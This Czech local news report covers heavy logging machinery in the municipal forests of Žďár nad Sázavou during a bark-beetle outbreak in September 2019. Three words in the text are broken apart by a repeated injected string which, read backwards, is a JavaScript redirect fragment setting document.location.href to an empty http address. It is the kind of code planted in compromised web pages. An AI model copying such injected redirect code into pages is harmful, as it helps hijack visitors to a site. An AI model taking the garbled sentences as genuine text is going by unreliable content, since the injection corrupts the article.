Rainbow page separator

Ve žďárských lesích se do konce září pohybuje těžká technika

Středa, 25. září 2019

Žďár nad Sázavou / Do konce září se mají obyvatelé Žďáru vyhnout městským lesům, kde aktuálně probíhá intenzivní těžba dřeva z důvodu kůrovcové kalamity prostřednictvím těžkých těžebních strojů – harves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů. Konkrétně se jedná o les Vetla, Radonínský les a zalesněné pozemky rozkládající se za strojírenskou firmou ŽĎAS.
Kůrovcová kalamita na Žďársku graduje, žďárský městský úřad v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to souvislosti již nějakou dobu opakovaně upozorňuje vlastníky lesů na nárůst stavu kůrovců v lesích a žádá je, aby opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovně prověřili v součinnosti s odborným lesním hospodářem své lesní porosty a odstranili, popřípadě asanovali napadené stromy. Zaměřit by se měli především na všechny dřeviny čerstvě schnoucí. Zvýšená aktivita vlastníků lesních porostů může omezit výši hmotných škod a celkově zbrzdit průběh kalamity.